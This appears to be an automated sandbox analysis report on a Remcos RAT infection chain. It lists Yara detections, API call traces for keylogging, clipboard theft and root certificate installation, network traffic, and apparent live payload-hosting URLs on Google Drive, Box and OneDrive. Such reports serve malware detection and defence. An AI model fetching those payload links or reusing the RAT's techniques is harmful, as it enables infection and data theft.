Source: sppsvc.pif, 00000009.00000003.1813378513.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: sppsvc.pif, 00000009.00000003.1813378513.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: sppsvc.pif, 00000009.00000003.1813378513.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: sppsvc.pif, 00000009.00000003.1813378513.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: kn.exe	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: kn.exe, 00000006.00000000.1648239065.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1652106938.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1660326356.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1654699931.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
Source: sppsvc.pif, 00000009.00000003.2527353506.000000000073D000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.2526235320.00000000148A1000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4103265846.0000000000735000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4104133533.0000000000746000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4116056398.0000000014911000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4104133533.000000000073E000.00000004.00000020.00020000.00000000.sdmp, Mywiztwu.PIF	String found in binary or memory: http://geoplugin.net/json.gp
Source: sppsvc.pif, 00000009.00000002.4117523372.00000000152FB000.00000040.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1995878504.000000007E810000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1961939328.0000000014550000.00000040.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000019.00000002.2042016371.000000001447B000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: sppsvc.pif, 00000009.00000003.2527353506.000000000073D000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4104133533.0000000000746000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpn.net/json.gp
Source: sppsvc.pif, 00000009.00000003.2527353506.000000000073D000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4104133533.000000000073E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpox.com
Source: sppsvc.pif, 00000009.00000003.1813378513.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: sppsvc.pif, 00000009.00000003.1813378513.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: sppsvc.pif, 00000009.00000003.1813378513.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: sppsvc.pif, 00000009.00000003.1813378513.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: sppsvc.pif, 00000009.00000003.1813378513.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: sppsvc.pif, 00000009.00000003.1813378513.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: sppsvc.pif, 00000009.00000003.1664121633.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, Mywiztwu.PIF, 00000018.00000002.1952084302.0000000002A7B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.pmail.com
Source: kn.exe	String found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
Source: kn.exe, 00000006.00000000.1648239065.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1652106938.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1660326356.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1654699931.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr	String found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
Source: sppsvc.pif, 00000009.00000002.4113851046.0000000013BBB000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1ZA0hVLfDKlM-5smXwBfb4RnNU-YQkBa6
Source: sppsvc.pif, 00000009.00000002.4103265846.000000000071B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1ZA0hVLfDKlM-5smXwBfb4RnNU-YQkBa6&export=download
Source: sppsvc.pif, 00000009.00000002.4103265846.00000000006EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://elmauz.box.com/public/static/gqtnnv55lt0beo9fdcpu8fhnomsn4frv
Source: sppsvc.pif, 00000009.00000002.4113851046.0000000013BC2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://elmauz.box.com/shared/static/gqtnnv55lt0beo9fdcpu8fhnomsn4frv
Source: kn.exe	String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
Source: kn.exe	String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
Source: kn.exe	String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
Source: sppsvc.pif, 00000009.00000002.4103265846.0000000000735000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://live.com/V
Source: kn.exe	String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
Source: kn.exe, 00000006.00000000.1648239065.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1652106938.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1660326356.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1654699931.00007FF66599E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr	String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
Source: kn.exe	String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token
Source: sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/download?resid=BAF30C9243AC3050%21114&authkey=
Source: sppsvc.pif, 00000009.00000003.1723811939.000000000077D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://public.boxcloud.com/d/1/b1
Source: sppsvc.pif, 00000009.00000003.1813378513.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4113851046.0000000013B55000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.1813038389.000000007E8C0000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1951246492.000000000256F000.00000004.00001000.00020000.00000000.sdmp, Mywiztwu.PIF, 00000018.00000002.1997696296.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: sppsvc.pif, 00000009.00000003.2527353506.0000000000764000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000002.4104133533.0000000000764000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sf0kkw.by.files.1drv.com/
Source: sppsvc.pif, 00000009.00000002.4103265846.00000000006EE000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 00000009.00000003.2527196256.000000000076E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sf0kkw.by.files.1drv.com/y4mJD7T-efm99Mj7M3bDWK61C5J_9E0cWaFQ8_Sv_xuuCr4GLOJRyaqXhymO2SZPGok
Source: sppsvc.pif, 00000009.00000002.4103265846.0000000000728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sf0kkw.by.files.1drv.com/y4mvIQn78bXO0uvUkh3kArWIhM3caELUIcFjkkKi4lmUsvh-b99o_L_XVqpG75xc3fv
Source: sppsvc.pif, 00000009.00000002.4103265846.0000000000728000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sf0kkw.by.files.1drv.com:443/y4mJD7T-efm99Mj7M3bDWK61C5J_9E0cWaFQ8_Sv_xuuCr4GLOJRyaqXhymO2SZ

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 74.112.186.144:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.112.186.144:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.112.186.128:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.101.102:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.101.132:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49739 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 9_2_1529A2B8 SetWindowsHookExA 0000000D,1529A2A4,00000000

9_2_1529A2B8

Installs a global keyboard hook

Source: C:\Users\Public\Libraries\sppsvc.pif

Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\sppsvc.pif

Jump to behavior

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 9_2_1529B70E OpenClipboard,GetClipboardData,CloseClipboard,

9_2_1529B70E

Source: C:\Users\Public\Libraries\Mywiztwu.PIF

Code function: 24_2_145668C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

24_2_145668C1

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 9_2_1529B70E OpenClipboard,GetClipboardData,CloseClipboard,

9_2_1529B70E

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 9_2_1529A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,

9_2_1529A3E0

Source: Yara match

File source: Process Memory Space: Mywiztwu.PIF PID: 6548, type: MEMORYSTR

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 24.2.Mywiztwu.PIF.14550000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Mywiztwu.PIF.14550000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000002.2031904948.0000000000704000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1995878504.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2527196256.000000000076E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1961939328.0000000014550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sppsvc.pif PID: 3664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Mywiztwu.PIF PID: 6548, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Mywiztwu.PIF PID: 3060, type: MEMORYSTR

Registers a new ROOT certificate

Source: C:\Users\Public\kn.exe

Code function: 6_2_00007FF6658DB684 CertCompareCertificateName,#357,#357,CertEnumCertificatesInStore,CertCompareCertificateName,CertComparePublicKeyInfo,memcmp,#357,CertEnumCertificatesInStore,#357,CertFreeCertificateContext,CertAddCertificateContextToStore,GetLastError,

6_2_00007FF6658DB684

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Users\Public\Libraries\sppsvc.pif

Code function: 9_2_152AC9E2 SystemParametersInfoW,

9_2_152AC9E2

Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658E25E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,	6_2_00007FF6658E25E8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66595A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,	6_2_00007FF66595A740
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66591E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,	6_2_00007FF66591E1F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665920EF4 NCryptImportKey,#205,#359,#359,#357,	6_2_00007FF665920EF4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665956EA8 NCryptImportKey,#360,	6_2_00007FF665956EA8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665910F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,	6_2_00007FF665910F58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,	6_2_00007FF66590EA7C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658E29A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,	6_2_00007FF6658E29A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66591184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,	6_2_00007FF66591184C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659598B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,	6_2_00007FF6659598B0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66592342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,	6_2_00007FF66592342C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659593A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	6_2_00007FF6659593A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658AF9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,	6_2_00007FF6658AF9B8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658BFC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,	6_2_00007FF6658BFC20

System Summary

Malicious sample detected (through community Yara rule)

Source: 24.2.Mywiztwu.PIF.14550000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.Mywiztwu.PIF.14550000.5.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.Mywiztwu.PIF.14550000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.Mywiztwu.PIF.14550000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 24.2.Mywiztwu.PIF.14550000.5.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.Mywiztwu.PIF.14550000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000009.00000002.4117523372.00000000152FB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000018.00000002.1995878504.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000019.00000002.2042016371.000000001447B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000018.00000002.1961939328.0000000014550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000018.00000002.1961939328.0000000014550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000018.00000002.1961939328.0000000014550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: Process Memory Space: sppsvc.pif PID: 3664, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: Mywiztwu.PIF PID: 6548, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: Mywiztwu.PIF PID: 3060, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\Public\Libraries\MywiztwuO.bat, type: DROPPED	Matched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen

Source: C:\Users\Public\Libraries\sppsvc.pif

Process Stats: CPU usage > 49%

Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683FA1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	3_2_00007FF683FA1538
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F73D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	3_2_00007FF683F73D94
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F8898C NtQueryInformationToken,	3_2_00007FF683F8898C
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F889E4 NtQueryInformationToken,NtQueryInformationToken,	3_2_00007FF683F889E4
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F87FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	3_2_00007FF683F87FF8
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	3_2_00007FF683F888C0
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F9BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	3_2_00007FF683F9BCF0
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F88114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	3_2_00007FF683F88114
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683FA1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	5_2_00007FF683FA1538
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F73D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,	5_2_00007FF683F73D94
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F8898C NtQueryInformationToken,	5_2_00007FF683F8898C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F889E4 NtQueryInformationToken,NtQueryInformationToken,	5_2_00007FF683F889E4
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F87FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,	5_2_00007FF683F87FF8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F888C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,	5_2_00007FF683F888C0
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F9BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	5_2_00007FF683F9BCF0
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F88114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	5_2_00007FF683F88114
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66597C964 NtQuerySystemTime,RtlTimeToSecondsSince1970,	6_2_00007FF66597C964
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_0284C3F8 NtCreateFile,NtWriteFile,	9_2_0284C3F8
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_0284C368 NtDeleteFile,	9_2_0284C368
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_0284C4DC NtOpenFile,NtReadFile,	9_2_0284C4DC
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_02847968 NtAllocateVirtualMemory,	9_2_02847968
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_0284C3F6 NtCreateFile,NtWriteFile,	9_2_0284C3F6
